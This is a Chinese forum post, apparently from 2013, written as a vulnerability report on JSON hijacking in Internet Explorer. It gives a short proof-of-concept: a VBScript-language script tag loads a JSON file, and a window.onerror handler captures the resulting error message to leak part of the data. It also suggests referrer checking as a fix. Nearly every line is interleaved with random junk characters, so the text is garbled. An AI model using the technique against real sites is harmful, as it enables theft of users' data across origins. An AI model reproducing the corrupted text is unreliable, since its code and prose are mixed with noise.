简要描述:8 f f- H: d9 N& \8 R% W. `* K+ f
$ N. P- E+ k4 |6 g由于某些资源容器对数据处理不当导致json劫持漏洞.7 Z4 l& l! }4 h) C+ q# {: s
详细说明:* N t d1 d c3 u) V* \$ b7 P
由于ie支持vbscript,所以script元素可以指定成vbscript语言:4 H# N! z2 V2 S# P( L7 z% b
<script language=vbscript></script>
. J. m5 P& |( w6 O3 l) Y& W
2 X; W0 Q( Y1 F+ \0 S当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
' K8 O- C ?% Z/ W/ m+ m) B漏洞证明:
2 N& n) {& j$ X<script>
/ {* N4 O. ?; owindow.onerror=function(_){
5 |0 ^8 s5 ? O+ e! f: p8 A7 Q' jalert(_); ~% p5 X& n: M, F9 L
}
! ?; G$ t1 E4 _4 z1 l# W) k5 N& C</script>
2 S" b. G9 f+ t: t, g<script language=vbscript src=1.json></script>
% V9 q8 g% _: f2 F* b3 D 3 [1 K" }' t' ?/ {) C' O
1 C" M# b' Z. P; j, [* b1 r1.json:0 c8 \: U4 ?' S, t8 p) m
[{"name":"sogili","age":19}]5 F4 v# D% z8 ~- |; |1 A1 P
修复方案:
8 s1 E) C$ Z7 V- |网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对